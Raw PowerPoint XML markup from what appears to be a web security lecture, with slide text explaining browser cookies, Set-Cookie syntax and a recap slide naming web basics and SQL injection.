            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1039813" y="890588"/>
            <a:ext cx="8221662"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60338" indent="-1476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cookie is a small piece of information that a server sends to a browser and stored inside the browser. A cookie has a name and a value, and other attribute such as domain and path, expiration date, version number, and comments</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browser automatically includes the cookie in all its subsequent requests to the originating host of the cookie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8D736981-05AF-2B43-B5D2-DF58742004C3}"/>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1)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CB15F1E-DA67-624B-8E08-74AEFEDF3014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1039813" y="890588"/>
            <a:ext cx="8239125"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60338" indent="-1476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cookie is a small piece of information that a server sends to a browser and stored inside the browser. A cookie has a name and a value, and other attribute such as domain and path, expiration date, version number, and comments</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browser automatically includes the cookie in all its subsequent requests to the originating host of the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">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Cookies are only sent back by the browser to their originating host and not any other hosts. Domain and path specify which server (and path) to return the cookie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6E8FD75-53EC-4343-A6E3-766180294F92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2475316" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="-325" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-105" dirty="0"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>eviously</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A08760A0-8909-634F-A990-1BE53221026C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="3983038"/>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8D7E36A4-8F5F-4D4C-BF36-70E5F82BC7E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="3930650"/>
            <a:ext cx="1885950" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>basics</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{355366F9-FBEE-9948-AB4D-BDB163131035}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="481647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EEEA9651-F674-4B44-BF19-AAC3B20EF546}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="4756150"/>
            <a:ext cx="2128838" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="-30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:endParaRPr sz="27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5176FCAA-4420-664F-B0F0-2D3D3D6F9530}"/>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1)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96AF9F46-FAA5-5441-91FF-FF0CEC1D4B79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1039813" y="890588"/>
            <a:ext cx="8242300"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60338" indent="-1476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cookie is a small piece of information that a server sends to a browser and stored inside the browser. A cookie has a name and a value, and other attribute such as domain and path, expiration date, version number, and comments</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browser automatically includes the cookie in all its subsequent requests to the originating host of the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">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Cookies are only sent back by the browser to their originating host and not any other hosts. Domain and path specify which server (and path) to return the cookie</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server can set the cookie’s value to uniquely identify a client. Hence, cookies are commonly used for session and user management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FADD91B7-89AB-9949-B760-81778198DB13}"/>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1)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1A43AD9-CF54-BD42-AD4F-ED526B0901E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1052513" y="890588"/>
            <a:ext cx="8243887" cy="675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60338" indent="-147638">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cookie is a small piece of information that a server sends to a browser and stored inside the browser. A cookie has a name and a value, and other attribute such as domain and path, expiration date, version number, and comments</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browser automatically includes the cookie in all its subsequent requests to the originating host of the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">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Cookies are only sent back by the browser to their originating host and not any other hosts. Domain and path specify which server (and path) to return the cookie</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A server can set the cookie’s value to uniquely identify a client. Hence, cookies are commonly used for session and user management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130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Cookies can be used to hold personalized information, or to help in on-line sales/service (e.g. shopping cart), or tracking popular links.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BA1FDA8-B72C-B640-8384-907481B2B1A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="304800"/>
            <a:ext cx="8515350" cy="892175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="57050" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="41203" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5300" spc="5" dirty="0"/>
              <a:t>Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5300" spc="-25" dirty="0"/>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5300" spc="5" dirty="0"/>
              <a:t>key-value </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5300" spc="65" dirty="0"/>
              <a:t>pairs</a:t>
            </a:r>
            <a:endParaRPr sz="5300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA157CB6-4BCF-C24E-939B-5ED1C806A302}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="1384300"/>
            <a:ext cx="5183188" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Set-Cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>options</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>….</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51204" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{789CA484-47A7-C74A-B5EC-2DCA22A191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893888"/>
            <a:ext cx="8786812"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8D9BE8F9-2B4C-F343-AD34-E3588D6232DB}"/>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2)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AE85BBD-6BB5-2844-9EEC-016FAD6559E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="969963" y="3024188"/>
            <a:ext cx="2371725" cy="14874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47108" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77A020FF-76B6-8643-8F7C-B3EDC2810435}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4675188" y="4079875"/>
            <a:ext cx="69850" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 32385"/>
              <a:gd name="T1" fmla="*/ 2147483646 w 32385"/>
              <a:gd name="T2" fmla="*/ 0 60000 65536"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T2">
                <a:pos x="T0" y="0"/>
              </a:cxn>
              <a:cxn ang="T3">
                <a:pos x="T1" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32385">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32278" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="505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object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79496F14-0309-574A-803C-8689CA8AF798}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3975100" y="3267075"/>
            <a:ext cx="3000375" cy="750888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="71543" algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-77" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-287" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-77" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="33" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-77" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="33" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1083" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-1242" baseline="41666" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1480" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-347" baseline="41666" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1889" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-230" baseline="41666" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-298" baseline="41666" dirty="0">
                <a:latin typeface="Eras Bold ITC"/>
                <a:cs typeface="Eras Bold ITC"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1767" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-15" baseline="41666" dirty="0">
                <a:latin typeface="Eras Bold ITC"/>
                <a:cs typeface="Eras Bold ITC"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="148" baseline="41666" dirty="0">
                <a:latin typeface="Eras Bold ITC"/>
                <a:cs typeface="Eras Bold ITC"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-77" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="33" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-77" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="33" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-939" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="110" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>→</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="88"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" spc="-2136" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>←</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-99" dirty="0">
                <a:latin typeface="Eras Bold ITC"/>
                <a:cs typeface="Eras Bold ITC"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2799" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-11" dirty="0">
                <a:latin typeface="Eras Bold ITC"/>
                <a:cs typeface="Eras Bold ITC"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-784" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-1854" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-475" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2452" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-77" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2055" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-442" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2651" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-353" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-1069" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-1854" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-674" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2468" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="331" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-1005" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-1657" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-77" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2898" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="44" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-420" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2103" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
